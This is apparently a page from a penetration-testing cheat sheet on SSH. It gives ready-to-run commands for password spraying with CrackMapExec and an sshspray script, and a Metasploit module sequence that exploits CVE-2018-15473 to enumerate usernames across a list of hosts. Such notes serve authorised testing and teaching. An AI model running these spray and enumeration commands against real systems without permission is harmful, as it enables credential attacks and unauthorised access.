SSH
Secure Shell

Password Spray

Password spray with a private key and passphrase Passw0rd! using CME:
$ cme ssh 192.168.1.11 -u snovvcrash -p 'Passw0rd!' --key-file id_rsa
Using sshspray:
$ python3 sshspray.py -u snovvcrash -i ~/.ssh/id_rsa -t ssh.txt

Enum Users

CVE-2018-15473
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf > set CHECK_FALSE true
msf > set RHOSTS file:ssh.txt
msf > set THREADS 25
msf > set USERNAME root
msf > run
Copy link
On this page
Password Spray
Enum Users